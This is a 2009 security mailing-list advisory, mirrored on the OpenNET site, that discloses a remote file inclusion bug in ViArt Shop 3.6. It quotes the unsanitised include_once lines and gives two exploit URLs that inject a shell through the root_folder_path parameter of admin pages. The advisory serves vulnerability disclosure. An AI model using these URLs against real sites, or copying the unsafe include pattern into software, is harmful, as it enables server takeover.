The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


RFI Bug


<< Previous INDEX Search src / Print Next >> 
Date: 16 Feb 2009 17:13:08 -0000
From: Dr.linux@gmx.net
To: bugtraq@securityfocus.com
Subject: RFI Bug
X-Virus-Scanned: antivirus-gw at tyumen.ru

ViArt Shop 3.6   Remote File Include BUG



FreeDownload :  http://www.viart.com/tracking_downloads.php?fn=viart_shop-3.6.zip
 
 

#FOUND BY : Dr-Linux

#Mail : Dr.linux@gmx.net



    

include_once($root_folder_path."includes/common.php");
        
include_once($root_folder_path . "includes/record.php");



Exploi >>> http://www.target/path/admin/admin_forgotten_password.php?root_folder_path=&#091;shell] 


    

include_once($root_folder_path . "messages/" . $language_code . "/download_messages.php");



Exploit >>> http://www.target/path/admin/admin_admin.php?root_folder_path=&#091;shell]

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру